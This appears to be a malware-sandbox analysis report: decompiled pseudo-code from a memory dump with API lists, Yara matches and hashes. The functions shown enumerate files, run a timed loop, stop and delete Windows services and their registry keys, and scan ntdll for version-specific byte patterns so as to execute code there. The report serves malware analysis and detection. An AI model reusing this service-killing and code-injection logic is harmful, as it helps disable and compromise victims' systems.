                                                                                    0x04eb54b8
                                                                                    0x04eb54b8
                                                                                    0x00000000
                                                                                    0x04eb55f6
                                                                                    0x04eb5603
                                                                                    0x04eb5609
                                                                                    0x04eb5609
                                                                                    0x04eb5617
                                                                                    0x04eb5623
                                                                                    0x04eb5625
                                                                                    0x04eb5628
                                                                                    0x04eb562e
                                                                                    0x04eb5635
                                                                                    0x04eb563b
                                                                                    0x04eb5644
                                                                                    0x04eb5652
                                                                                    0x04eb563d
                                                                                    0x04eb563d
                                                                                    0x04eb563d
                                                                                    0x04eb565d
                                                                                    0x04eb5661
                                                                                    0x04eb566c
                                                                                    0x04eb566c
                                                                                    0x04eb5678
                                                                                    0x04eb5683
                                                                                    0x04eb5457
                                                                                    0x04eb5469
                                                                                    0x04eb5469
                                                                                    0x00000000

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: FileFindFirstlstrlenwsprintf
                                                                                    • String ID: %s%s%s$%s%s*.*$list<T> too long
                                                                                    • API String ID: 4287520746-3667615295
                                                                                    • Opcode ID: 60a5852c19c783973d12779d61b4bdcc13c44bac27998b712cd2afea5fdb4079
                                                                                    • Instruction ID: ac684e6c77b0a16840f55a1b5263cc55e01b3fc072bbe907397a25410aa8e732
                                                                                    • Opcode Fuzzy Hash: 60a5852c19c783973d12779d61b4bdcc13c44bac27998b712cd2afea5fdb4079
                                                                                    • Instruction Fuzzy Hash: C261C370A00219AFDB21DF24CC45BEBB7B8FF45318F4491D5D989A7240EB31AA84CFA1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EB3C30, Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 163sleepsynchronizationCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 45%
                                                                                    			E04EB3C30(void* __ebx, void* __edi, void* __esi, char* _a4) {
				signed int _v8;
				intOrPtr _v14;
				intOrPtr _v18;
				intOrPtr _v22;
				intOrPtr _v26;
				intOrPtr _v30;
				intOrPtr _v34;
				intOrPtr _v38;
				intOrPtr _v42;
				char _v44;
				intOrPtr _v48;
				unsigned int _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				long _v72;
				signed int _t84;
				long _t103;
				unsigned int _t107;
				intOrPtr _t117;
				signed int _t119;
				intOrPtr _t135;
				signed int _t137;
				void* _t146;
				intOrPtr _t152;
				long _t154;
				signed int _t155;
				signed int _t156;
				intOrPtr _t157;
				char* _t159;
				signed int _t160;

				_t84 =  *0x4f03008; // 0x3d21fb31
				_v8 = _t84 ^ _t160;
				_t159 = _a4;
				_v72 = GetTickCount();
				_t154 = GetTickCount();
				_v56 =  *((intOrPtr*)(_t159 + 0x10));
				_v60 =  *((intOrPtr*)(_t159 + 0x14));
				_v64 =  *((intOrPtr*)(_t159 + 0x18));
				_v68 =  *((intOrPtr*)(_t159 + 0x1c));
				_v44 = 0x267;
				while( *((char*)(_t159 + 1)) != 0) {
					_t103 = GetTickCount();
					_t142 = _t103 - _t154;
					_t107 = 0x10624dd3 * (_t103 - _t154) >> 0x20 >> 6;
					_v52 = _t107;
					if(_t107 >= 5) {
						_t154 = GetTickCount();
						_v48 = _t154;
						if( *((intOrPtr*)( *((intOrPtr*)(_t159 + 4)) + 8)) != 0) {
							_t152 =  *((intOrPtr*)(_t159 + 0x14));
							_t157 =  *((intOrPtr*)(_t159 + 0x18));
							_t135 =  *((intOrPtr*)(_t159 + 0x1c));
							_v42 =  *((intOrPtr*)(_t159 + 0x10));
							_v38 = _t152;
							asm("sbb edx, [ebp-0x38]");
							_v34 = _t157;
							_v30 = _t135;
							_v26 = E04EF1760( *((intOrPtr*)(_t159 + 0x10)) - _v56, _t152, _v52, 0);
							_t146 = _t157 - _v64;
							_v22 = _t152;
							asm("sbb eax, [ebp-0x40]");
							_v18 = E04EF1760(_t146, _t135, _v52, 0);
							_push(_t146);
							_t142 =  *(_t159 + 8);
							_v56 =  *((intOrPtr*)(_t159 + 0x10));
							_push(0x3f);
							_v60 =  *((intOrPtr*)(_t159 + 0x14));
							_push(0x22);
							_push( &_v44);
							_v14 = _t152;
							_v64 = _t157;
							_v68 = _t135;
							E04EB1C60( *(_t159 + 8));
							_t154 = _v48;
						}
						_t117 =  *((intOrPtr*)(_t159 + 4));
						if( *((short*)(_t117 + 0x16)) == 2) {
							_t156 = 0;
							if( *((intOrPtr*)(_t117 + 0x1c)) > 0) {
								do {
									_t119 = E04EDEB76(_t142) & 0x800000ff;
									if(_t119 < 0) {
										_t119 = (_t119 - 0x00000001 | 0xffffff00) + 1;
									}
									_t142 =  *( *((intOrPtr*)(_t159 + 4)) + 0x3c);
									 *(_t156 +  *( *((intOrPtr*)(_t159 + 4)) + 0x3c)) = _t119;
									_t156 = _t156 + 1;
								} while (_t156 <  *((intOrPtr*)( *((intOrPtr*)(_t159 + 4)) + 0x1c)));
							}
							_t154 = _v48;
						}
					}
					Sleep(0x64);
					_t137 = GetTickCount() - _v72;
					if(0x88888889 * (0x10624dd3 * _t137 >> 0x20 >> 6) >> 0x20 >> 5 >= ( *( *((intOrPtr*)(_t159 + 4)) + 0x14) & 0x0000ffff)) {
						 *((char*)(_t159 + 1)) = 0;
					}
				}
				if( *((intOrPtr*)(_t159 + 0x38)) != 0) {
					_t137 = 0;
					_t155 = 0;
					if(0 <  *( *((intOrPtr*)(_t159 + 4)) + 0x12)) {
						do {
							WaitForSingleObject( *( *((intOrPtr*)(_t159 + 0x38)) + _t155 * 4), 0xffffffff);
							CloseHandle( *( *((intOrPtr*)(_t159 + 0x38)) + _t155 * 4));
							_t155 = _t155 + 1;
						} while (_t155 < ( *( *((intOrPtr*)(_t159 + 4)) + 0x12) & 0x0000ffff));
					}
					 *_t159 = 1;
				}
				_push(_t137);
				_push(0x3f);
				_push(2);
				_v44 = 0x67;
				E04EB1C60( *(_t159 + 8));
				return E04ED572E(_v8 ^ _t160,  &_v44);
			}



































                                                                                    0x04eb3c36
                                                                                    0x04eb3c3d
                                                                                    0x04eb3c48
                                                                                    0x04eb3c4e
                                                                                    0x04eb3c57
                                                                                    0x04eb3c5c
                                                                                    0x04eb3c62
                                                                                    0x04eb3c68
                                                                                    0x04eb3c6e
                                                                                    0x04eb3c71
                                                                                    0x04eb3c77
                                                                                    0x04eb3c80
                                                                                    0x04eb3c89
                                                                                    0x04eb3c8f
                                                                                    0x04eb3c92
                                                                                    0x04eb3c98
                                                                                    0x04eb3ca0
                                                                                    0x04eb3ca5
                                                                                    0x04eb3cac
                                                                                    0x04eb3cb1
                                                                                    0x04eb3cb4
                                                                                    0x04eb3cb7
                                                                                    0x04eb3cbf
                                                                                    0x04eb3cc5
                                                                                    0x04eb3cc8
                                                                                    0x04eb3ccd
                                                                                    0x04eb3cd0
                                                                                    0x04eb3cdd
                                                                                    0x04eb3ce2
                                                                                    0x04eb3ce7
                                                                                    0x04eb3cea
                                                                                    0x04eb3cf4
                                                                                    0x04eb3cfa
                                                                                    0x04eb3cfb
                                                                                    0x04eb3cfe
                                                                                    0x04eb3d04
                                                                                    0x04eb3d06
                                                                                    0x04eb3d0c
                                                                                    0x04eb3d0e
                                                                                    0x04eb3d0f
                                                                                    0x04eb3d12
                                                                                    0x04eb3d15
                                                                                    0x04eb3d18
                                                                                    0x04eb3d23
                                                                                    0x04eb3d23
                                                                                    0x04eb3d26
                                                                                    0x04eb3d2e
                                                                                    0x04eb3d30
                                                                                    0x04eb3d35
                                                                                    0x04eb3d37
                                                                                    0x04eb3d3c
                                                                                    0x04eb3d41
                                                                                    0x04eb3d49
                                                                                    0x04eb3d49
                                                                                    0x04eb3d4d
                                                                                    0x04eb3d50
                                                                                    0x04eb3d53
                                                                                    0x04eb3d57
                                                                                    0x04eb3d37
                                                                                    0x04eb3d5c
                                                                                    0x04eb3d5c
                                                                                    0x04eb3d2e
                                                                                    0x04eb3d61
                                                                                    0x04eb3d70
                                                                                    0x04eb3d8b
                                                                                    0x04eb3d8d
                                                                                    0x04eb3d8d
                                                                                    0x04eb3d91
                                                                                    0x04eb3d9f
                                                                                    0x04eb3da4
                                                                                    0x04eb3da6
                                                                                    0x04eb3dac
                                                                                    0x04eb3db4
                                                                                    0x04eb3dbc
                                                                                    0x04eb3dc4
                                                                                    0x04eb3dcd
                                                                                    0x04eb3dd2
                                                                                    0x04eb3db4
                                                                                    0x04eb3dd6
                                                                                    0x04eb3dd6
                                                                                    0x04eb3dd9
                                                                                    0x04eb3de0
                                                                                    0x04eb3de2
                                                                                    0x04eb3de5
                                                                                    0x04eb3deb
                                                                                    0x04eb3e02

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CountTick$__aulldiv$CloseHandleObjectSingleSleepWait
                                                                                    • String ID: g
                                                                                    • API String ID: 227884459-30677878
                                                                                    • Opcode ID: 0b55696e8f3690d3d28b6e9dc44e89eddf3c1967469998a5eb69adfbff574f77
                                                                                    • Instruction ID: 9c0114d3fc95ef66bef7e7e62f47a746050466dafc939a8027a9c61533315d39
                                                                                    • Opcode Fuzzy Hash: 0b55696e8f3690d3d28b6e9dc44e89eddf3c1967469998a5eb69adfbff574f77
                                                                                    • Instruction Fuzzy Hash: 6F512871A006089FCB24DFA9D985AAEFBF6FF48310F409519E896E7651D730F845CB60
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EC3A20, Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 80servicesleepCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 95%
                                                                                    			E04EC3A20(void* __ebx, short* __ecx, void* __edi, void* __esi) {
				signed int _v8;
				short _v2056;
				intOrPtr _v2080;
				struct _SERVICE_STATUS _v2084;
				short* _v2088;
				void* _v2092;
				signed int _t13;
				void* _t15;
				void* _t38;
				short* _t41;
				void* _t42;
				signed int _t43;

				_t13 =  *0x4f03008; // 0x3d21fb31
				_v8 = _t13 ^ _t43;
				_t41 = __ecx;
				_v2088 = __ecx;
				_t15 = OpenSCManagerW(0, 0, 0xf003f);
				_v2092 = _t15;
				if(_t15 == 0) {
					L12:
					return E04ED572E(_v8 ^ _t43);
				}
				_t38 = OpenServiceW(_t15, _t41, 0xf01ff);
				if(_t38 == 0) {
					L11:
					CloseServiceHandle(_v2092);
					goto L12;
				}
				_t42 = 0;
				do {
					if(QueryServiceStatus(_t38,  &_v2084) == 0) {
						goto L6;
					}
					if(_v2080 == 1) {
						if(DeleteService(_t38) != 0) {
							E04EDDAD0(_t38,  &_v2056, 0, 0x800);
							wsprintfW( &_v2056, L"SYSTEM\\CurrentControlSet\\Services\\%s", _v2088);
							SHDeleteKeyW(0x80000002,  &_v2056);
						}
						L10:
						CloseServiceHandle(_t38);
						goto L11;
					}
					ControlService(_t38, 1,  &_v2084);
					Sleep(0x1f4);
					L6:
					_t42 = _t42 + 0x1f4;
				} while (_t42 < 0x1388);
				goto L10;
			}















                                                                                    0x04ec3a29
                                                                                    0x04ec3a30
                                                                                    0x04ec3a3c
                                                                                    0x04ec3a40
                                                                                    0x04ec3a46
                                                                                    0x04ec3a4c
                                                                                    0x04ec3a54
                                                                                    0x04ec3b1e
                                                                                    0x04ec3b2f
                                                                                    0x04ec3b2f
                                                                                    0x04ec3a68
                                                                                    0x04ec3a6c
                                                                                    0x04ec3b11
                                                                                    0x04ec3b17
                                                                                    0x00000000
                                                                                    0x04ec3b1d
                                                                                    0x04ec3a72
                                                                                    0x04ec3a74
                                                                                    0x04ec3a84
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ec3a8d
                                                                                    0x04ec3ac3
                                                                                    0x04ec3ad3
                                                                                    0x04ec3aea
                                                                                    0x04ec3aff
                                                                                    0x04ec3b05
                                                                                    0x04ec3b0a
                                                                                    0x04ec3b0b
                                                                                    0x00000000
                                                                                    0x04ec3b0b
                                                                                    0x04ec3a99
                                                                                    0x04ec3aa4
                                                                                    0x04ec3aaa
                                                                                    0x04ec3aaa
                                                                                    0x04ec3ab0
                                                                                    0x00000000

                                                                                    APIs
                                                                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F), ref: 04EC3A46
                                                                                    • OpenServiceW.ADVAPI32(00000000,?,000F01FF), ref: 04EC3A62
                                                                                    • QueryServiceStatus.ADVAPI32(00000000,?,?,000F01FF), ref: 04EC3A7C
                                                                                    • ControlService.ADVAPI32(00000000,00000001,?,?,000F01FF), ref: 04EC3A99
                                                                                    • Sleep.KERNEL32(000001F4,?,000F01FF), ref: 04EC3AA4
                                                                                    • DeleteService.ADVAPI32(00000000,?,000F01FF), ref: 04EC3ABB
                                                                                    • wsprintfW.USER32 ref: 04EC3AEA
                                                                                    • SHDeleteKeyW.SHLWAPI(80000002,?), ref: 04EC3AFF
                                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,000F01FF), ref: 04EC3B0B
                                                                                    • CloseServiceHandle.ADVAPI32(?,?,000F01FF), ref: 04EC3B17
                                                                                    Strings
                                                                                    • SYSTEM\CurrentControlSet\Services\%s, xrefs: 04EC3AE4
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Service$CloseDeleteHandleOpen$ControlManagerQuerySleepStatuswsprintf
                                                                                    • String ID: SYSTEM\CurrentControlSet\Services\%s
                                                                                    • API String ID: 3594024867-2757632955
                                                                                    • Opcode ID: 1139fce738fe2c27d54128bc77afd8c5439dedc3e0d3fd4cd391440be45f83ff
                                                                                    • Instruction ID: e20d171badddc05f1da510ea2703c7f31b010cae7537a218197b383c7d676e7f
                                                                                    • Opcode Fuzzy Hash: 1139fce738fe2c27d54128bc77afd8c5439dedc3e0d3fd4cd391440be45f83ff
                                                                                    • Instruction Fuzzy Hash: 2521B571A00218ABDB209B65DD48FBAB7BCFB44705F0090AAFD49E2144DE359E45CFA0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EBC990, Relevance: 17.9, APIs: 5, Strings: 5, Instructions: 351librarymemoryloaderCOMMONCrypto
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 49%
                                                                                    			E04EBC990(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
				signed int _v8;
				short _v12;
				char _v16;
				char _v18;
				short _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				short _v36;
				char _v40;
				intOrPtr _v304;
				signed int _v308;
				intOrPtr _v312;
				char _v316;
				intOrPtr _v320;
				signed int _v324;
				signed int _t97;
				intOrPtr _t99;
				_Unknown_base(*)()* _t104;
				void* _t109;
				intOrPtr _t110;
				signed int _t111;
				void* _t112;
				void* _t117;
				void* _t123;
				void* _t128;
				void* _t131;
				void* _t135;
				void* _t138;
				void* _t141;
				signed int _t146;
				intOrPtr _t150;
				signed int _t156;
				signed int _t157;
				void* _t158;
				void* _t163;
				void* _t169;
				void* _t173;
				void* _t174;
				signed int _t177;
				void* _t178;
				void* _t179;
				intOrPtr* _t183;
				signed int _t184;
				signed int _t186;
				void* _t187;
				void* _t189;
				void* _t191;
				void* _t194;
				signed int _t197;
				void* _t198;
				char* _t200;
				void* _t202;
				struct HINSTANCE__* _t204;
				void* _t206;
				signed int _t207;
				signed int _t208;
				void* _t210;
				signed int _t212;
				void* _t215;
				void* _t217;
				void* _t218;
				void* _t220;
				signed int _t224;

				_t187 = __edi;
				_t141 = __ebx;
				_t97 =  *0x4f03008; // 0x3d21fb31
				_v8 = _t97 ^ _t224;
				_t99 =  *((intOrPtr*)(__ecx + 0xc));
				if( *((intOrPtr*)(_t99 + 0xc0)) <= 0 ||  *((intOrPtr*)(_t99 + 0xc4)) <= 0) {
					L94:
					__eflags = _v8 ^ _t224;
					return E04ED572E(_v8 ^ _t224);
				} else {
					_t204 = GetModuleHandleA("ntdll");
					if(_t204 == 0) {
						L93:
						goto L94;
					} else {
						E04EDDAD0(__edi,  &_v316, 0, 0x114);
						_t104 = GetProcAddress(_t204, "RtlGetVersion");
						if(_t104 == 0) {
							goto L93;
						} else {
							_push( &_v316);
							if( *_t104() != 0 || _t204->i != 0x5a4d) {
								goto L93;
							} else {
								_t183 =  *((intOrPtr*)(_t204 + 0x3c)) + _t204;
								if( *_t183 != 0x4550) {
									goto L93;
								} else {
									_t156 = 0;
									_t109 = ( *(_t183 + 0x14) & 0x0000ffff) + 0x18 + _t183;
									_t184 =  *(_t183 + 6) & 0x0000ffff;
									if(_t184 == 0) {
										goto L93;
									} else {
										while(( *(_t109 + 0x24) & 0x20000000) == 0) {
											_t156 = _t156 + 1;
											_t109 = _t109 + 0x28;
											if(_t156 < _t184) {
												continue;
											} else {
												return E04ED572E(_v8 ^ _t224);
											}
											goto L95;
										}
										_t157 =  *(_t109 + 0x10);
										_v324 = _t157;
										_t186 =  *((intOrPtr*)(_t109 + 0xc)) + _t204;
										__eflags = _t186;
										if(_t186 == 0) {
											goto L93;
										} else {
											__eflags = _t157;
											if(_t157 == 0) {
												goto L93;
											} else {
												_t110 = _v312;
												_push(_t141);
												_push(_t187);
												__eflags = _t110 - 0xa;
												if(_t110 != 0xa) {
													__eflags = _t110 - 6;
													if(_t110 != 6) {
														goto L92;
													} else {
														_t111 = _v308;
														__eflags = _t111 - 3;
														if(_t111 == 3) {
															goto L49;
														} else {
															__eflags = _t111 - 2;
															if(_t111 != 2) {
																__eflags = _t111 - 1;
																if(_t111 != 1) {
																	goto L92;
																} else {
																	_v24 = 0x458d2074;
																	_t191 = _t157 - 8;
																	_v20 = 0x96a50d4;
																	_t210 = 0;
																	__eflags = 0;
																	do {
																		_t163 = 0;
																		__eflags = 0;
																		while(1) {
																			_t117 = _t163 + _t210;
																			__eflags =  *((intOrPtr*)(_t117 + _t186)) -  *((intOrPtr*)(_t224 + _t163 - 0x14));
																			if( *((intOrPtr*)(_t117 + _t186)) !=  *((intOrPtr*)(_t224 + _t163 - 0x14))) {
																				break;
																			}
																			_t163 = _t163 + 1;
																			__eflags = _t163 - 8;
																			if(_t163 < 8) {
																				continue;
																			}
																			break;
																		}
																		__eflags = _t163 - 8;
																		if(_t163 == 8) {
																			_t212 = _t210 + 0xffffffec + _t186;
																			__eflags = _t212;
																			if(_t212 == 0) {
																				goto L92;
																			} else {
																				 *((intOrPtr*)(VirtualAlloc(0, 0x50, 0x3000, 4) + 0x18)) = _a4;
																				 *_t212();
																				__eflags = _v8 ^ _t224;
																				return E04ED572E(_v8 ^ _t224, _t119);
																			}
																		} else {
																			goto L84;
																		}
																		goto L95;
																		L84:
																		_t210 = _t210 + 1;
																		__eflags = _t210 - _t191;
																	} while (_t210 <= _t191);
																	__eflags = _v8 ^ _t224;
																	return E04ED572E(_v8 ^ _t224);
																}
															} else {
																_t146 = 0;
																_v16 = 0x8908458b;
																_v12 = 0xa045;
																_t194 = _t157 - 6;
																_v32 = 0x23fb4868;
																_t215 = 0;
																__eflags = 0;
																_v28 = 0x6a;
																do {
																	_t169 = 0;
																	__eflags = 0;
																	while(1) {
																		_t123 = _t169 + _t215;
																		__eflags =  *((intOrPtr*)(_t123 + _t186)) -  *((intOrPtr*)(_t224 + _t169 - 0xc));
																		if( *((intOrPtr*)(_t123 + _t186)) !=  *((intOrPtr*)(_t224 + _t169 - 0xc))) {
																			break;
																		}
																		_t169 = _t169 + 1;
																		__eflags = _t169 - 6;
																		if(_t169 < 6) {
																			continue;
																		}
																		break;
																	}
																	__eflags = _t169 - 6;
																	if(_t169 == 6) {
																		_t146 = _t186 - 0xc + _t215;
																		__eflags = _t146;
																	} else {
																		goto L64;
																	}
																	L67:
																	__eflags = _t146;
																	if(_t146 != 0) {
																		L77:
																		 *((intOrPtr*)(VirtualAlloc(0, 0x50, 0x3000, 4) + 0x18)) = _a4;
																		 *_t146();
																		__eflags = _v8 ^ _t224;
																		return E04ED572E(_v8 ^ _t224, _t125);
																	} else {
																		_t217 = 0;
																		_t197 = _v324 + 0xfffffffb;
																		__eflags = _t197;
																		do {
																			_t173 = 0;
																			asm("o16 nop [eax+eax]");
																			while(1) {
																				_t128 = _t173 + _t217;
																				__eflags =  *((intOrPtr*)(_t128 + _t186)) -  *((intOrPtr*)(_t224 + _t173 - 0x1c));
																				if( *((intOrPtr*)(_t128 + _t186)) !=  *((intOrPtr*)(_t224 + _t173 - 0x1c))) {
																					break;
																				}
																				_t173 = _t173 + 1;
																				__eflags = _t173 - 5;
																				if(_t173 < 5) {
																					continue;
																				}
																				break;
																			}
																			__eflags = _t173 - 5;
																			if(_t173 == 5) {
																				_t146 = _t186 - 7 + _t217;
																				__eflags = _t146;
																			} else {
																				goto L73;
																			}
																			L76:
																			__eflags = _t146;
																			if(_t146 == 0) {
																				goto L92;
																			} else {
																				goto L77;
																			}
																			goto L95;
																			L73:
																			_t217 = _t217 + 1;
																			__eflags = _t217 - _t197;
																		} while (_t217 <= _t197);
																		goto L76;
																	}
																	goto L95;
																	L64:
																	_t215 = _t215 + 1;
																	__eflags = _t215 - _t194;
																} while (_t215 <= _t194);
																goto L67;
															}
														}
													}
												} else {
													__eflags = _v308;
													if(_v308 != 0) {
														L92:
														goto L93;
													} else {
														_t150 = _v304;
														__eflags = _t150 - 0x3fab;
														if(_t150 <= 0x3fab) {
															__eflags = _t150 - 0x3ad7 - 0x4d4;
															if(_t150 - 0x3ad7 > 0x4d4) {
																__eflags = _t150 - 0x3ad7;
																if(_t150 >= 0x3ad7) {
																	goto L92;
																} else {
																	L49:
																	_v24 = 0x6a096a50;
																	_t189 = _t157 - 7;
																	_v20 = 0x8b01;
																	_t206 = 0;
																	__eflags = 0;
																	_v18 = 0xc1;
																	do {
																		_t158 = 0;
																		__eflags = 0;
																		while(1) {
																			_t112 = _t158 + _t206;
																			__eflags =  *((intOrPtr*)(_t112 + _t186)) -  *((intOrPtr*)(_t224 + _t158 - 0x14));
																			if( *((intOrPtr*)(_t112 + _t186)) !=  *((intOrPtr*)(_t224 + _t158 - 0x14))) {
																				break;
																			}
																			_t158 = _t158 + 1;
																			__eflags = _t158 - 7;
																			if(_t158 < 7) {
																				continue;
																			}
																			break;
																		}
																		__eflags = _t158 - 7;
																		if(_t158 == 7) {
																			_t207 = _t206 + 0xffffffe5;
																			__eflags = _t207;
																			goto L89;
																		} else {
																			goto L54;
																		}
																		goto L95;
																		L54:
																		_t206 = _t206 + 1;
																		__eflags = _t206 - _t189;
																	} while (_t206 <= _t189);
																	__eflags = _v8 ^ _t224;
																	return E04ED572E(_v8 ^ _t224);
																}
															} else {
																_v16 = 0x4d8dc18b;
																_t198 = _t157 - 6;
																_v12 = 0x51bc;
																_t218 = 0;
																__eflags = 0;
																do {
																	_t174 = 0;
																	__eflags = 0;
																	while(1) {
																		_t131 = _t174 + _t218;
																		__eflags =  *((intOrPtr*)(_t131 + _t186)) -  *((intOrPtr*)(_t224 + _t174 - 0xc));
																		if( *((intOrPtr*)(_t131 + _t186)) !=  *((intOrPtr*)(_t224 + _t174 - 0xc))) {
																			break;
																		}
																		_t174 = _t174 + 1;
																		__eflags = _t174 - 6;
																		if(_t174 < 6) {
																			continue;
																		}
																		break;
																	}
																	__eflags = _t174 - 6;
																	if(_t174 == 6) {
																		_t207 = _t218 + 0xffffffe8;
																		L89:
																		_t208 = _t207 + _t186;
																		__eflags = _t208;
																		goto L90;
																	} else {
																		goto L45;
																	}
																	goto L95;
																	L45:
																	_t218 = _t218 + 1;
																	__eflags = _t218 - _t198;
																} while (_t218 <= _t198);
																__eflags = _v8 ^ _t224;
																return E04ED572E(_v8 ^ _t224);
															}
														} else {
															_v16 = 0x4d8dc18b;
															_t200 =  &_v40;
															_v12 = 0x51ac;
															_v40 = 0xc085f633;
															_v36 = 0x379;
															_v24 = 0x85b04589;
															_v20 = 0x75c0;
															_v18 = 0x12;
															_v320 = 0x2c;
															__eflags = _t150 - 0x42ee;
															if(_t150 != 0x42ee) {
																__eflags = _t150 - 0x47ba;
																if(_t150 == 0x47ba) {
																	L20:
																	_v320 = 0x2e;
																} else {
																	__eflags = _t150 - 0x47bb;
																	if(_t150 == 0x47bb) {
																		goto L20;
																	}
																}
															} else {
																_t200 =  &_v16;
																_v320 = 0x18;
															}
															_t220 = 0;
															_t177 = _t157 + 0xfffffffa;
															__eflags = _t177;
															_v32 = _t177;
															do {
																_t178 = 0;
																asm("o16 nop [eax+eax]");
																while(1) {
																	_t135 = _t178 + _t220;
																	__eflags =  *((intOrPtr*)(_t135 + _t186)) -  *((intOrPtr*)(_t178 + _t200));
																	if( *((intOrPtr*)(_t135 + _t186)) !=  *((intOrPtr*)(_t178 + _t200))) {
																		break;
																	}
																	_t178 = _t178 + 1;
																	__eflags = _t178 - 6;
																	if(_t178 < 6) {
																		continue;
																	}
																	break;
																}
																__eflags = _t178 - 6;
																if(_t178 == 6) {
																	_t208 = _t220 - _v320 + _t186;
																	__eflags = _t208;
																} else {
																	goto L26;
																}
																L29:
																__eflags = _t208;
																if(_t208 != 0) {
																	L91:
																	 *((intOrPtr*)(VirtualAlloc(0, 0x50, 0x3000, 4) + 0x18)) = _a4;
																	 *_t208();
																} else {
																	__eflags = _t150 - 0x4a61;
																	if(_t150 == 0x4a61) {
																		_v32 = 0;
																		_t202 = _v324 + 0xfffffff9;
																		asm("o16 nop [eax+eax]");
																		do {
																			_t179 = 0;
																			__eflags = 0;
																			while(1) {
																				_t138 = _t179 + _t208;
																				__eflags =  *((intOrPtr*)(_t138 + _t186)) -  *((intOrPtr*)(_t224 + _t179 - 0x14));
																				if( *((intOrPtr*)(_t138 + _t186)) !=  *((intOrPtr*)(_t224 + _t179 - 0x14))) {
																					break;
																				}
																				_t179 = _t179 + 1;
																				__eflags = _t179 - 7;
																				if(_t179 < 7) {
																					continue;
																				}
																				break;
																			}
																			__eflags = _t179 - 7;
																			if(_t179 == 7) {
																				_t208 = _t208 + 0xffffffd8 + _t186;
																				__eflags = _t208;
																			} else {
																				goto L36;
																			}
																			L90:
																			if(__eflags != 0) {
																				goto L91;
																			}
																			goto L92;
																			L36:
																			_t208 = _t208 + 1;
																			__eflags = _t208 - _t202;
																		} while (_t208 <= _t202);
																		_t208 = _v32;
																		__eflags = _t208;
																		goto L90;
																	}
																}
																goto L92;
																L26:
																_t220 = _t220 + 1;
																__eflags = _t220 - _v32;
															} while (_t220 <= _v32);
															_t208 = 0;
															goto L29;
														}
													}
												}
											}
										}
									}
								}
							}
						}
					}
				}
				L95:
			}



































































                                                                                    0x04ebc990
                                                                                    0x04ebc990
                                                                                    0x04ebc999
                                                                                    0x04ebc9a0
                                                                                    0x04ebc9a3
                                                                                    0x04ebc9ad
                                                                                    0x04ebcdde
                                                                                    0x04ebcde1
                                                                                    0x04ebcdeb
                                                                                    0x04ebc9c0
                                                                                    0x04ebc9cc
                                                                                    0x04ebc9d0
                                                                                    0x04ebcddd
                                                                                    0x00000000
                                                                                    0x04ebc9d6
                                                                                    0x04ebc9e4
                                                                                    0x04ebc9f2
                                                                                    0x04ebc9fa
                                                                                    0x00000000
                                                                                    0x04ebca00
                                                                                    0x04ebca06
                                                                                    0x04ebca0b
                                                                                    0x00000000
                                                                                    0x04ebca1f
                                                                                    0x04ebca22
                                                                                    0x04ebca2a
                                                                                    0x00000000
                                                                                    0x04ebca30
                                                                                    0x04ebca34
                                                                                    0x04ebca39
                                                                                    0x04ebca3b
                                                                                    0x04ebca41
                                                                                    0x00000000
                                                                                    0x04ebca47
                                                                                    0x04ebca47
                                                                                    0x04ebca50
                                                                                    0x04ebca51
                                                                                    0x04ebca56
                                                                                    0x00000000
                                                                                    0x04ebca58
                                                                                    0x04ebca66
                                                                                    0x04ebca66
                                                                                    0x00000000
                                                                                    0x04ebca56
                                                                                    0x04ebca6c
                                                                                    0x04ebca6f
                                                                                    0x04ebca75
                                                                                    0x04ebca75
                                                                                    0x04ebca77
                                                                                    0x00000000
                                                                                    0x04ebca7d
                                                                                    0x04ebca7d
                                                                                    0x04ebca7f
                                                                                    0x00000000
                                                                                    0x04ebca85
                                                                                    0x04ebca85
                                                                                    0x04ebca8b
                                                                                    0x04ebca8c
                                                                                    0x04ebca8d
                                                                                    0x04ebca90
                                                                                    0x04ebcc65
                                                                                    0x04ebcc68
                                                                                    0x00000000
                                                                                    0x04ebcc6e
                                                                                    0x04ebcc6e
                                                                                    0x04ebcc74
                                                                                    0x04ebcc77
                                                                                    0x00000000
                                                                                    0x04ebcc79
                                                                                    0x04ebcc79
                                                                                    0x04ebcc7c
                                                                                    0x04ebcd38
                                                                                    0x04ebcd3b
                                                                                    0x00000000
                                                                                    0x04ebcd41
                                                                                    0x04ebcd41
                                                                                    0x04ebcd48
                                                                                    0x04ebcd4b
                                                                                    0x04ebcd52
                                                                                    0x04ebcd52
                                                                                    0x04ebcd54
                                                                                    0x04ebcd54
                                                                                    0x04ebcd54
                                                                                    0x04ebcd56
                                                                                    0x04ebcd56
                                                                                    0x04ebcd5c
                                                                                    0x04ebcd60
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ebcd62
                                                                                    0x04ebcd63
                                                                                    0x04ebcd66
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ebcd66
                                                                                    0x04ebcd68
                                                                                    0x04ebcd6b
                                                                                    0x04ebcd88
                                                                                    0x04ebcd88
